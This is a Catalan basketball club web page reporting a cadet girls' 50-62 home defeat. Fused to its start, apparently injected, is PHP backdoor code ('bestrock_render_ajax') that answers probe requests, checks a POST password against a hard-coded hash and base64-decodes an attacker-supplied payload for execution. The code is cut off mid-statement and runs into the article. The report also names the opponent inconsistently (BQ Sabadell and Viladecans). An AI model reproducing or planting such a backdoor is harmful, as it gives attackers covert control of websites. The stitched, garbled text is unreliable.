function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet Fem 08A fa patir al líder (50-62) - Tgn Bàsquet Club -

El Cadet Fem 08A fa patir al líder (50-62)

Updated: febrer 14, 2024

Aquesta setmana toca partit al capdamunt de la classificació, primer contra segon classificat. Ens visita un BQ Sabadell que en teoria haurà de ser el primer de grup al final de la lliga. Equip molt complert tant per físic com per talent. La temporada passada ja ens vam enfrontar amb una victòria per a cada equip.

Ha estat un partit molt igualat fins el darrer quart, on les visitants han aprofitat 3 minuts de poc encert en atac de les nostres liles, per poder marxar en el marcador. La seva pressió a tot camp ens ha fet patir massa en certs moments de partit i això és quelcom a millorar. En els darrers cinc minuts de partit elles s’han dedicat a gestionar l’avantatge.

Primera derrota d’aquesta segona fase. Ja havíem parlat que algun dia tocaria perdre. Però ho hem fet plantant cara a un molt bon equip, que segurament hauria d’estar a preferent A, però que un mal partit a fases el va deixar a preferent B. No marxem contentes cap a casa, però si satisfetes per la feina ben feta. Ens hem esforçat al màxim com sempre però no ha pogut ser.

Tenim una setmana per refer-nos, millorar detalls i sobretot preparar-nos per visitar la setmana vinent al Cornellà, equip amb el qual ja vam jugar la temporada passada i que ens va posar en moltes dificultats. No serà gens fàcil. Força LILES!!

CADET FEM 08A 50 – VILADECANS 62

Parcials: 17-20; 31-36 ; 43-44 ; 50-62

TGN: DIANA 5 ; JUNY 2, SOFIA 4 ; MARINA 24 , DANIELA 2; HELENA 2 ; JULIA 2 ; ÈLIA 2 ;
MARTA 4, MIREIA 0; LUCIA 0, PAULA 3

BQ SABADELL : JULIA 4, DANIELA 9, JUDIT 5, LAIA 0, ANNA 0, ARIADNA 0, ALBA H 10 ; LAIA R 6,